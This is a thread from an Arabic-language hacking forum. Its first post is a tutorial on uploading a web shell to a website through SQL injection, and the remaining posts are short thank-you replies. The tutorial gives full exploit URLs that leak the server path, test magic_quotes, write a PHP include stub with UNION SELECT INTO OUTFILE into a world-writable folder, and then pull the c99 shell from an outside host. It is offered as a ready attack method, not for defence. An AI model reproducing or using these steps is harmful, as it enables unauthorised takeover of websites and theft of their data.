اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

درس رفع الشل من خلال ثغرات السيكول sql

درس رفع الشل من خلال ثغرات السيكول sql


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 20

الموضوع: درس رفع الشل من خلال ثغرات السيكول sql

  1. #1
    هكر مجتهد Array الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    Come درس رفع الشل من خلال ثغرات السيكول sql



    السلام عليكم و رحمة الله تعلى و بركاته
    -أرجو أن تكونوا في تمام الصحة و العافية-

    في الكثير من الحالات نستطيع حقن الموقع لكن لا نجد الأدمن و الباس
    أو يكون الباس غير قابل للكسر
    أو نجدها ولا نجد مسار لوحة التحكم
    أو يكون الموقع محمي بجدار ناري

    أردت أن أضيف لكم معلومة ( للذين لا يعرفونها )
    نستطيع أن نرفع شل من حقنة السيكول
    و الطريقة كالتالي :
    أولا :
    يجب أن نعرف مسارنا على السرفر
    و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
    --------------------------------------------------------------------
    بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
    -------------------------------------------------------------------
    لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
    و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
    -----------------
    مثال:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
    هذه جملة خطأ
    ومسارنا فيها..
    و هو
    /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
    المهم نحفظ المسار و نتابع
    ---------------
    الآن نأتي لكيفية معرفة ال
    magic quotes on أو off
    لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
    ب load_file('/')
    أي سيكون الإستغلال هكذا
    نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
    http://www.target.com/file.php?id=-1...39;),5,6,7,8,9
    و نرى
    إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
    و نستطيع مواصلة عملنا
    أما إذا كان ال magic quotes on
    فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
    ------------------------------
    طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
    -----------------------------
    نبحث عن أي شيئ مصرح بتصريح 777
    -----------------------------
    و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
    مثلا هذا مسار صورة www.target.com/images/image.jpg
    أي سيكون مسار الملف المصرح هو /images/
    الذي يأتي بعد مسارنا على السرفر طبعا
    ---------------------------------
    نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
    '<?include("$iraq"); ?>'
    و نضيف هذا الأمر في آخر السطر
    into+outfile+
    ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
    home/dudi/public_html/
    ثم نضيف مسار الملف المصرح ب777
    /images/
    ثم اسم الملف المصاب المراد رفعه بإمتداد php
    مثلا example.php
    ------------------
    ليكون الاستغلال كتالي
    كود PHP:
    www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php"
    الآن تم إشائ الملف المقصود و هو هنا

    www.target.com/images/example.php
    الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

    وذلك بالتالي
    كود PHP:
    www.target.com/images/example.php?iraq=http://c99.txt.tc/c99.txt? 
    طبعا http://c99.txt.tc/c99.txt
    هو مسار الشل بصيغة txt مرفوع جاهز
    و ألف مبروك على الإختراق-----

    من طرف
    Hidden Pain
    إهداء لجميع أعضاء منتدى جيوش الهكر الكرام




  2. #2
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    فـلسـpÃŁęsțÎŅeـطينـﮱ
    المشاركات
    1,765

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    يشرفني ان اكون من اول من رد علي الموضوع المتميز والله يعطيك العافيه )^_^(


  3. #3
    هكر متميز Array
    تاريخ التسجيل
    May 2010
    المشاركات
    1,950

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    مــبدع ...مبدع مبـــدع

    لــبى قــلبك شرح رائع من عضو اروع



  4. #4
    هكر مجتهد Array الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    لي كل الشرف بمروركما على موضوعي
    شكرا لكما


  5. #5
    هكر مجتهد Array الصورة الرمزية Crypto Seven
    تاريخ التسجيل
    Jul 2010
    الدولة
    L!nux Zone
    المشاركات
    334

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    مشكووووووووووووووور


  6. #6
    هكر متميز Array الصورة الرمزية System 32
    تاريخ التسجيل
    Sep 2009
    الدولة
    System 32
    المشاركات
    634

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    رائع ابداااع مشكووووور علي الطرح الجميل



  7. #7
    هكر مجتهد Array الصورة الرمزية Crypto Seven
    تاريخ التسجيل
    Jul 2010
    الدولة
    L!nux Zone
    المشاركات
    334

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    مشكوووووووور على الطرح الحلو


  8. #8
    هكر نشيط Array الصورة الرمزية sewase3
    تاريخ التسجيل
    Jan 2010
    الدولة
    UnKnown
    المشاركات
    166

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    موضوع متميز, الله يعطيك العافيه


  9. #9
    محظور Array
    تاريخ التسجيل
    Jul 2010
    الدولة
    dark
    المشاركات
    1,130

    افتراضي رد: **--::درس رفع الشل من خلال ثغرات السيكول ( sql )::--**

    tankkkkkkkkkkkkkkkkkkks



  10. #10
    هكر مبتديء Array الصورة الرمزية Abedghammar
    تاريخ التسجيل
    Dec 2009
    المشاركات
    94

    افتراضي رد: درس رفع الشل من خلال ثغرات السيكول sql

    مــبدع ...مبدع مبـــدع


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. ثغرات جاهزه لرفع الشل لمنتديات 3.6.9 vb
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 75
    آخر مشاركة: 02-24-2012, 06:05 AM
  2. حصري وبانفراد تعلم برمجه الشل خلال 24 ساعه مع Teach Yourself shell Programming in 24
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 81
    آخر مشاركة: 02-05-2012, 11:13 AM
  3. طريقة رفع الشل من ثغرات السكيول
    بواسطة millen!um في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 17
    آخر مشاركة: 02-05-2011, 03:21 AM
  4. ثغرات السيكول
    بواسطة adam30 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-12-2010, 03:36 PM
  5. رفع الشل + ملف الشل + طريقة الدخول اليه
    بواسطة الحريف في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 12
    آخر مشاركة: 09-17-2010, 11:28 PM

وجد الزوار هذه الصفحة بالبحث عن:

شرح رفع الشل بثغرة sql

رفع الشل من sql

رفع الشل sql

رفع الشل من ثغرات sql

رفع الشل عن طريق ثغرة sql

كيف اعرف الملف المصاب لرفع الشل

رفع شيل من ثغرة sql

كيفية رفع الشل عن طريق ثغرة sql

ثغرة لرفع الشل

رفع الشل على موقع بثغرة sql

طريقة رفع شيل sqlرفع الشل على موقع sqlثغرة رفع الشلكيفية رفع الشل في sqmرفع الشل على ثغرات sqlطريقة رفع الشل بثغرة ‏sql‏ شرح إختراق ورفع الشل على ثغرة sqlكيف احمل الشيل علي النوقع المصاب رفع الشل من خلال ثغرات السيكول sqlكيفية رفع الشل على الموقع بثغرة sqlثغرة لرفع شلشرح رفع الشل على موقع مصابرفع الشل من تغرة سكيول رفع الشل علىى الموقع المصابة sqlثغرة sql ورفع الشل

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •